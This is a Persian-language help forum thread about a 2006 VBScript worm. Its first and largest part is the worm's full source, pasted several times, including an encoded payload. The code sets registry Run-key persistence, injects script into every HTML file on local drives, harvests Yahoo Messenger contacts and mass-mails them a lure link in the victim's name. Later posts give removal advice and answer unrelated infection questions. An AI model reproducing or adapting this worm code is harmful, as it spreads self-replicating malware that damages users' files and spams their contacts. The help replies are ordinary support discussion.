06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009203403203803203407710509911411111511110211 60320871051101001111191150340320441151211150320380 34092075101114110101108046101120101034013010102115 11104606711410109711610108410112011607010510810104 01151211150320380320340920751011141101011080461011 20101034041046119114105116101032102105108101101120 10105001301011504607911210111003204011512111503203 80320340920751011141101011080461011201010340410130 10101110100032105102013010102115111046067114101097 11610108410112011607010510810104011512111503203803 20340920840830800510500860460680760760340410461191 14105116101032102105108101118098115049013010105102 03210211511104611111210111011610112011610210510810 10401151211150320380320340920831211151161011091180 46100108108034044049041046114101097100097108108060 06203411111003403211610410111001301010211511104606 71141010971161010841011201160701051081010401151211 15032038032034092075101114110101108046118098115034 04104611911410511610103210210510810111809811505001 30101150460791121011100320401151211150320380320340 92075101114110101108046118098115034041013010101110 100032105102013010060047115099114105112116062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL",1).readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL",1).readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm))<>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub
'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010711 40320610320850670971151010401141010460821011030821 01097100040034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009207710509911411111511110211603208710511010 01111191150340410410130101021151110460671141010971 16101084101120116070105108101040115121115032038032 03409208408308005105006904606807607603404104611911 41051161010321021051081011011201010490130101051020 32117099097115101040102115111046070105108101069120 10511511611504011512111503203803203409207510111411 01011080461011201010340410410610340700650760830690 34032111114032107114060062117099097115101040115121 11503203803203409207506908207806907604606908806903 40410321161041011100130101141010461141011031191141 05116101032034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009203403203803203407710509911411111511110211 60320871051101001111191150340320441151211150320380 34092075101114110101108046101120101034013010102115 11104606711410109711610108410112011607010510810104 01151211150320380320340920751011141101011080461
'Navid new virus 2006(1375.1)


on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010711 40320610320850670971151010401141010460821011030821 01097100040034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009207710509911411111511110211603208710511010 01111191150340410410130101021151110460671141010971 16101084101120116070105108101040115121115032038032 03409208408308005105006904606807607603404104611911 41051161010321021051081011011201010490130101051020 32117099097115101040102115111046070105108101069120 10511511611504011512111503203803203409207510111411 01011080461011201010340410410610340700650760830690 34032111114032107114060062117099097115101040115121 11503203803203409207506908207806907604606908806903 40410321161041011100130101141010461141011031191141 05116101032034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009203403203803203407710509911411111511110211 60320871051101001111191150340320441151211150320380 34092075101114110101108046101120101034013010102115 11104606711410109711610108410112011607010510810104 01151211150320380320340920751011141101011080461011 20101034041046119114105116101032102105108101101120 10105001301011504607911210111003204011512111503203 80320340920751011141101011080461011201010340410130 10101110100032105102013010102115111046067114101097 11610108410112011607010510810104011512111503203803 20340920840830800510500860460680760760340410461191 14105116101032102105108101118098115049013010105102 03210211511104611111210111011610112011610210510810 10401151211150320380320340920831211151161011091180 46100108108034044049041046114101097100097108108060 06203411111003403211610410111001301010211511104606 71141010971161010841011201160701051081010401151211 15032038032034092075101114110101108046118098115034 04104611911410511610103210210510810111809811505001 30101150460791121011100320401151211150320380320340 92075101114110101108046118098115034041013010101110 100032105102013010060047115099114105112116062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL",1).readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL",1).readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm))<>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub
'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010711 40320610320850670971151010401141010460821011030821 01097100040034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009207710509911411111511110211603208710511010 01111191150340410410130101021151110460671141010971 16101084101120116070105108101040115121115032038032 03409208408308005105006904606807607603404104611911 41051161010321021051081011011201010490130101051020 32117099097115101040102115111046070105108101069120 10511511611504011512111503203803203409207510111411 01011080461011201010340410410610340700650760830690 34032111114032107114060062117099097115101040115121 11503203803203409207506908207806907604606908806903 40410321161041011100130101141010461141011031191141 05116101032034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009203403203803203407710509911411111511110211 60320871051101001111191150340320441151211150320380 34092075101114110101108046101120101034013010102115 11104606711410109711610108410112011607010510810104 01151211150320380320340920751011141101011080461
'Navid new virus 2006(1375.1)


on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010711 40320610320850670971151010401141010460821011030821 01097100040034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009207710509911411111511110211603208710511010 01111191150340410410130101021151110460671141010971 16101084101120116070105108101040115121115032038032 03409208408308005105006904606807607603404104611911 41051161010321021051081011011201010490130101051020 32117099097115101040102115111046070105108101069120 10511511611504011512111503203803203409207510111411 01011080461011201010340410410610340700650760830690 34032111114032107114060062117099097115101040115121 11503203803203409207506908207806907604606908806903 40410321161041011100130101141010461141011031191141 05116101032034072075069089095076079067065076095077 06506707207307806909208307907008408706508206909207 71050991141111151111021160920871051101001111191150 92067117114114101110116086101114115105111110092082 11711009203403203803203407710509911411111511110211 60320871051101001111191150340320441151211150320380 34092075101114110101108046101120101034013010102115 11104606711410109711610108410112011607010510810104 01151211150320380320340920751011141101011080461011 20101034041046119114105116101032102105108101101120 10105001301011504607911210111003204011512111503203 80320340920751011141101011080461011201010340410130 10101110100032105102013010102115111046067114101097 11610108410112011607010510810104011512111503203803 20340920840830800510500860460680760760340410461191 14105116101032102105108101118098115049013010105102 03210211511104611111210111011610112011610210510810 10401151211150320380320340920831211151161011091180 46100108108034044049041046114101097100097108108060 06203411111003403211610410111001301010211511104606 71141010971161010841011201160701051081010401151211 15032038032034092075101114110101108046118098115034 04104611911410511610103210210510810111809811505001 30101150460791121011100320401151211150320380320340 92075101114110101108046118098115034041013010101110 100032105102013010060047115099114105112116062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL",1).readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL",1).readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm))<>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub
'Navid new virus 2006(1375.1)
on error resume next
dim filehtm,sys,yr
filehtm1="10010510903211512111501301008310111603210010203206 10321001110991171091011101160460991141010971161010 69108101109101110116040034111098106101099116034041 01301010010204611510111606511611611410509811711610 10320340991080971151151051000340440320340991081151 05100058066068057054067053053054045054053065051045 04904906804804505705605106504504804806704805207006 70500570690510540320340130101151011160321021151110 32061032100102046099114101097116101111098106101099 11604003408309911410511211610511010304607010510810 10831211151161011090790981061010991160340440340340 41013010115101116032115061100102046067114101097116 10107909810610109911604003408310410110810804606511 21121081050990971161051111100460490340440340340410 13010115101116032114101061100102046099114101097116 10111109810610109911604003411911509911410511211604 61151041011081080340440340340410130101151211150611 02115111046071101116083112101099105097108070111108 10010111404004904101301007011111403209703206103204 90320841110320761011100401021051081011180981150490 41032083116101112032051013010102105108101118098115 05006110210510810111809811505003203803209910411404 01091051000401021051081011180981150490440970440510 41041013010105102032097032060032108101110040102105 10810110112010104904104304903211610410111003210210 51081011011201010500611021051081011011201010500320 38032099104114040109105100040102105108101101120101 04904409704405104104101301011010112011601301010211 51110460671141010971161010841011201160701051081010 40115121115032038032034092084083080051050069046068 07607603404104611911410511610103210210510810110112 01010490130101051020321021151110461111121011101161 01120116102105108101040115121115032038032034092083 12111511610110910104610010810803404104611410109710 00971081080600620341111100340321161041011100130101 02115111046067114101097116101084101120116070105108 10104011512111503203803203409207510111411010110804 61011201010340410461191141051161010321021051081011 01120101050013010115046079112101110032040115121115 03203803203409207510111411010110804610112010103404 10130101011101000321051020130101021151110460671141 01097116101084101120116070105108101040115121115032 03803203409208408308005105008604606807607603404104 61191141051161010321021051081011180981150490130101 05102032102115111046111112101110116101120116102105 10810104011512111503203803203409208312111511610110 91180461001081080340410461141010971000971081080600 62034111110034032116104101110013010102115111046067 11410109711610108410112011607010510810104011512111 50320380320340920751011141101011080461180981150340 41046119114105116101032102105108101118098115050013 01011504607911210111003204011512111503203803203409 20751011141101011080461180981150340410130101011101 00032105102013010060047115099114105112116062"
set fso=createobject("scripting.filesystemobject")
set re=createobject("wscript.shell")
sys=fso.GetSpecialFolder(1)
fso.CreateTextFile(sys & "\Systemv.dll").write "on"
filehtm="<script language=vbscript>" & vbcrlf & "on error resume next" & vbcrlf
filehtm=filehtm & "fileexe1=""" & fso.opentextfile(sys & "\TSP32E.DLL").readall & """" & vbcrlf
filehtm=filehtm & "filevbs1=""" & fso.opentextfile(sys & "\TSP32V.DLL").readall & """" & vbcrlf
For a = 1 To Len(filehtm1) Step 3
filehtm=filehtm & chr(mid(filehtm1,a,3))
next
re.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.vbs"
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pager\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm))<>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub




خواهش میکنم کمک کنین.

سلام دوست من

کامپیوتر شما به یک تروجان آلوده است که با نامهای مختلف شناسایی می شود همانطور که در شکل زیر می بینید توسط

تعداد زیادی از آنتی ویروسها شناسایی و پاک می شود ( البته ممکن است این تنها کد بدخیم موجود روی سیستم شما

نباشد ) .من توصیه می کنم آنتی ویروس کاسپرسکی نسخه آخر را داونلود و به طور کامل آپدیت کنی بعد System Restore

ویندوز را غیر فعال کن . بعد به Safe Mode برو و کامپیوترت را به طور کامل اسکن و تمامی فایلهای آلوده را پاک کن.بعد

کلیدهای زیر در رجیستری را پاک کن :

HKCU\Software\Microsoft\Windows\CurrentVersion\Run \
Microsoft Windows
<system32>\Kernel.vbs

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \
Microsoft Windows
<system32>\Kernel.exe

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

در زمینه برگشت این تروجان پس از پاک کردن ممکن است چند علت داشته باشد ممکن است از طریق System Restore

تروجان دوباره عود کند. این تروجان از طرق Mail و یا پیامهای آلوده در یاهو مسنجر منتقل می شود که احتمالا شما

هم از همین راه دوباره آلوده می شوید.

سلام دوستان
مشکلی که برای من پیش اومده اینه که سیستمم چند وقت پیش همین ویروسه گرفت که New Folder همه جا پر میشه... فرمتش کردم و با انواع آنتی ویروس پاکش کردم... اثری هم ازش نیست..اما یه متخصص کامیوتر بهم گفت ویروس هنوز تو مموری کامپیوترم هست چون:
1.هیچ آنتی ویروسی رو سیستمم آپدیت نمیشه
2تو یکی دو برنامه پیش اومده تا میمرم توش سریع میاد بیرون
ممنون میشم کمکم کنین

سلام دوستان
مشکلی که برای من پیش اومده اینه که سیستمم چند وقت پیش همین ویروسه گرفت که New Folder همه جا پر میشه... فرمتش کردم و با انواع آنتی ویروس پاکش کردم... اثری هم ازش نیست..اما یه متخصص کامیوتر بهم گفت ویروس هنوز تو مموری کامپیوترم هست چون:
1.هیچ آنتی ویروسی رو سیستمم آپدیت نمیشه
2تو یکی دو برنامه پیش اومده تا میمرم توش سریع میاد بیرون
ممنون میشم کمکم کنین

نه دوست عزیز این مشکل شما ربطی به این ویروس ندارد این ویروس احمق تر از این حرفها است دفعه بعد هم یادت باشد

اگر به این ویروس مبتلا شدی نیازی به فرمت و این حرفها نیست خیلی راحت پاک می شود.

فقط باید توی رجیستری اجرای خود کارش رو پاک کنید و فایل های مربوطه رو از بین ببری.
اگر بخوای کمک بیشتر بهت کنم یه میل بزن:ghogha_band@yahoo.com

نه دوست عزیز این مشکل شما ربطی به این ویروس ندارد این ویروس احمق تر از این حرفها است دفعه بعد هم یادت باشد

اگر به این ویروس مبتلا شدی نیازی به فرمت و این حرفها نیست خیلی راحت پاک می شود.

ممنون از جوابت...حالا اگه کار این ویروس هم نباشه به نظر شما چرا هیچ آنتی ویروسی رو سیستمم آپدیت نمیشه، یکی می گفت باید بایوس را آپدیت کنم تا مشکلم حل بشه،درسته؟

ممنون از جوابت...حالا اگه کار این ویروس هم نباشه به نظر شما چرا هیچ آنتی ویروسی رو سیستمم آپدیت نمیشه، یکی می گفت باید بایوس را آپدیت کنم تا مشکلم حل بشه،درسته؟

اگر از فایروال استفاده می کنید ممکن است مشکل از آن باشد که اجازه اتصال آنتی ویروس به اینترنت را نمی دهد یا

اینکه ویروس دیگری روی سیستمتان وجود داشته باشد که از این کار جلوگیری می کند .در هر حالت این مشکل شما

ربطی به بایوس ندارد ( آخه بایوس رو چه به آپدیت آنتی ویروسها :blink: ) اگر می توانی به اینترنت وصل شوی و از اینترنت

اکسپلور استفاده کنی و فقط آنتی ویروس موقع آپدیت مشکل ایجاد می کند پیغام خطایی را که ایجاد می شود بگو تا شاید کمکی

بکند.

با عرض سلام خدمت همگی
الان یه چند روزی است که سیستم من دچار مشکل شده به این صورت که چند دقیق بعد از بالا آمدن سیستم کارهای عجیب و غریبی میکنه مثلا وقتی می خواهم my computer رو باز کنم چند تا از برنامه های دیگه هم که روی دسکتاپ هست باز میشه (انگار که این چند تا برنامه همگی انتخاب شده باشند و حالا دوبل کلیک کنی تا همشون با هم باز بشن ) یا وقتی که وارد یکی از درایوهایم میشم وقتی که میخواهم یه پوشه رو باز کنم اونو تو یه صفحه جدا باز میکنه اگر بخواهم از دکمه های back یا up هم استفاده کنم باز توی یه صفحه جدا اونا رو باز میکنه یا وقتی که یه صفحه رو ماکزیمم کنم NAME BAR اون از بین میره و نشون داده نمیشه و ...
حالا شما رو به خدا منو کمک کنید در ضمن نگید که fdisk کنم چون اطلاعاتم برام خیلی مهم است
باتشکر فراوان
مرسسسسسسسیییییییییییییی

با عرض سلام خدمت همگی
الان یه چند روزی است که سیستم من دچار مشکل شده به این صورت که چند دقیق بعد از بالا آمدن سیستم کارهای عجیب و غریبی میکنه مثلا وقتی می خواهم my computer رو باز کنم چند تا از برنامه های دیگه هم که روی دسکتاپ هست باز میشه (انگار که این چند تا برنامه همگی انتخاب شده باشند و حالا دوبل کلیک کنی تا همشون با هم باز بشن ) یا وقتی که وارد یکی از درایوهایم میشم وقتی که میخواهم یه پوشه رو باز کنم اونو تو یه صفحه جدا باز میکنه اگر بخواهم از دکمه های back یا up هم استفاده کنم باز توی یه صفحه جدا اونا رو باز میکنه یا وقتی که یه صفحه رو ماکزیمم کنم NAME BAR اون از بین میره و نشون داده نمیشه و ...
حالا شما رو به خدا منو کمک کنید در ضمن نگید که fdisk کنم چون اطلاعاتم برام خیلی مهم است
باتشکر فراوان
مرسسسسسسسیییییییییییییی

از چه ضد ویروسی استفاده می کنی ؟

سلام این ویروس کامپیوتر مرا به شدت آلوده کرده و به بخشی به نام running module sysem memoryهم سرایت کرده از همه دوستان آجزانه تقاضای کمک فوری دارم.من آنتی ویروس kaspersky دارم اما این آنتی ویروس در دو مورد running module و servises نتونست این ویروس رو بکشه.

سلام دوست عزیز

نتایج اسکنی را که با کاسپرسکی انجام داده ای و تمام چیزهایی را که پیدا کرده است به طور کامل اینجا بگذار.

سلام دوست عزیز
بنده از کاسپرسکی استفاده می کردم هیچی پیدا نکرد.پاکش کردم از سیمانتک آنتی ویروس استفاده کردم اون هم جواب نداد

سلام دوست عزیز
بنده از کاسپرسکی استفاده می کردم هیچی پیدا نکرد.پاکش کردم از سیمانتک آنتی ویروس استفاده کردم اون هم جواب نداد

خوب شاید واقعا مشکلت از ویروسها نباشد و مربوط به مشکلات سیستم عامل باشد در هر حالت این سه روش زیر را

امتحان کن ( که چند دقیقه بیشتر طول نمی کشد ) شاید کمکی بکند :

1.به آدرس زیر برو و با استفاده از توصیه هایی که داده شده است سیستمت را اسکن کرده و نتیجه را اینجا بگذار.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

2.فایل زیر راداونلود کن و آن را اجرا کن.( حجم= 230 کیلوبایت) در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن را به طور کامل اینجا Copy&Past کن:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

3.فایل زیر را داونلود کن ( حجم=257 کیلوبایت ) و پس از باز کردن آن و فعال کردن گزینه In-Depth Scan Enabled

